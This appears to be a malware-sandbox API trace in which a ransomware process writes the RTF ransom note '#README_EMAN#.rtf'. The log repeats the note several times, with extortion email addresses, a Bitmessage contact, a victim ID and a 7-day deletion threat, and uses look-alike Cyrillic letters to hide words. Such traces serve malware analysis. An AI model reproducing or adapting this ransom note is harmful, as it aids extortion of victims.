br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.705] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0289.706] WriteFile (in: hFile=0x2cc, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.706] CloseHandle (hObject=0x2cc) returned 1 [0289.706] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ka\\#readme_eman#.rtf")) returned 0xffffffff [0289.706] GetLastError () returned 0x2 [0289.706] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ka\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ka\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0289.707] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . 